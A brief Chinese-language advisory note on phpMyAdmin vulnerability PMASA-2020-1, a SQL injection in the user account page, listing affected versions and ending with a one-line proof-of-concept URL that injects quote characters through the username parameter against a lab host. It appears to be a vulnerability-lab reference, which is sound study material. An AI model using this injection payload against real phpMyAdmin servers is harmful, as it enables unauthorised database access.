phpmyadmin PMASA-2020-1 漏洞
参考链接:https://xz.aliyun.com/t/7092
一、漏洞简介
在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。
二、漏洞影响
phpmyadmin <= 5.00
phpmyadmin <= 4.94
三.POC;
1 | 1.最短生效的poc:http://vulfocus.fofa.so:27320/pma/server_privileges.php?ajax_request=true&validate_username=true&username=test%27%22 |